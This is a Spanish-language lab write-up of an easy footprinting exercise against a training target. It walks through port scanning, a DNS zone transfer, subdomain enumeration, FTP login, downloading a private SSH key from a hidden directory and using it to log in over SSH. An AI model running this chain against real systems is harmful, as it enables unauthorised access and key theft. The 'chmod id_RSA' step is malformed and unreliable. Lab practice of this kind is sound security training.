🟢 Laboratorio de Huella - Nivel Fácil

📝 El enunciado nos indica que ya tenemos credenciales iniciales:


🚀 Escaneo inicial con Nmap

sudo nmap -p- --open -sS -vvv --min-rate 5000 -n -Pn 10.129.42.195 -oG networked

🔎 Puertos abiertos detectados:

🔍 Escaneo con detección de servicios y scripts

sudo nmap -sC -sV -p21,22,53,2121 -n -Pn -oN script_scan.txt 10.129.42.195

{C3553A9E-BF5A-4BC1-A78C-F5E79D0E257B}.png
El puerto 2121 corresponde a un servicio ProFTPD ⚓.


📡 Enumeración DNS

El enunciado también menciona que hay que investigar algo relacionado con DNS, así que consultamos todos los registros del dominio:

dig axfr inlanefreight.htb @10.129.42.195

🔎 Encontramos varios subdominios. El más relevante parece ser:

Pasted image 20250804171757.png
Agregamos el subdominio al archivo /etc/hosts:

echo "10.129.42.195 internal.inlanefreight.htb" | sudo tee -a /etc/hosts

🔁 Luego escaneamos más subdominios con dnsenum:

dnsenum --dnsserver 10.129.42.195 --enum -p 0 -s 0 \
  -o subdomains.txt \
  -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
 internal.inlanefreight.htb

📍 Encontramos otro subdominio interesante:

Lo agregamos también:
Pasted image 20250804172327.png

echo "10.129.42.195 ftp.internal.inlanefreight.htb" | sudo tee -a /etc/hosts
ftp ftp.internal.inlanefreight.htb 2121

📂 Acceso al FTP en puerto 2121

Ingresamos con:

¡Ya estamos dentro! 🎉
{3F824814-B056-4AAF-AFE6-D262576C4C0B}.png

🔐 Descubrimiento de clave SSH

🔎 Al listar los archivos ocultos en el FTP, descubrimos un directorio .ssh que contiene la clave privada id_rsa.

📥 La descargamos:

get .ssh/id_rsa
chmod id_RSA

🖥️ Acceso por SSH

Nos conectamos como el usuario ceil usando la clave descargada:

ssh -i id_rsa ceil@10.129.42.195

✅ ¡Ya estamos dentro de la máquina como ceil! 🧑‍💻
{A0586F93-9C8D-4B22-A28F-33B16E2C8FC4}.png